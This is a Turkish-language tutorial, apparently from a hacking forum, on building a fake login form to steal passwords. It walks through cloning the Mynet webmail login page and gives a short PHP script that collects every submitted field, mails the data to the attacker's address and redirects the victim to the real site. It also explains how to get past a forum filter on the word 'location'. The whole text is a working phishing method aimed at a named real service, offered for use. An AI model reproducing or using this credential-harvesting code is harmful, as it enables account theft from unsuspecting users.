Fake Form Hazırlama Tekniği
Fake formlar kullanıcılara x sitesinde bulunduğu izlenimi verip giriş yapmasını sağlayan login arayüzleridir. Buralara girilen veriler size istediğiniz yollarla iletilebilmektedir. Bu teknikte size php ile istediğiniz bir siteden oluşturacağınız formdan alacağınız verileri mail adresinize sorunsuz olarak nasıl iletebileceğinizi anlatacağız...
Fake formlarla kullanıcıları kandırarak şifrelerine erişmek mümkün. Bu formları oluşturmak için öncelikle hedefimizi seçiyoruz. Örnek olarak mynet ile başlayabiliriz...
Mynet sitesine girip login formunun bulunduğu bölüme giriyoruz(http://eposta.mynet.com). Ardından açılan sayfayı menuden dosya/farklı kaydete girip bilgisayarınıza tüm içeriği ile kayıt ediyorsunuz. Bilgisayarınızda tıkladığınızda acilacak şekilde.
Ardından kayıt ettiğimiz dosyayı index.html olarak değiştirip, dosyayı bir html editorunde acin. Html editorunde tasarımı hiç bozmadan,
Böyle bir iskelet oluşturduğumuz sürece script.php dosyamıza her türlü veriyi aktarıp mail adresimizden bu verileri alabiliriz.
Aşağıdaki script ozel olarak her türlü sistemde kullanabileceğiniz şekilde POST ile gelen bütün verileri ayırarak tek bir değişken içinde size sunup mailinize iletmektedir:
PHP- Kodu:
Kod:
foreach ($_POST as $v) { $bas = "$bas $v"; $i++;}
mail('mail@mailadresiniz.com', 'test', $bas);
header("l ocation: http://www.yonleneceksiteadresi(mynet).com");
?>
Not: l ocation bölümündeki l den sonra gelen boşluğu doldurmayı unutmayın; sistemde l o c a t i o n yazımı sansürlü
Bu dosyayi sunucunuzda script.php ya da istediginiz bir adla saklayabilirsiniz.
Örnek mynet fake mail formu çalışır şekilde eklenmiştir. Bilgisayarınızda açıp şifre girip gondere basarsanız sistemde size gonderilecek verilerin ornegini gorebilirsiniz. Burada sadece gonderilen veriler basılacak, mail gitmeyecek. |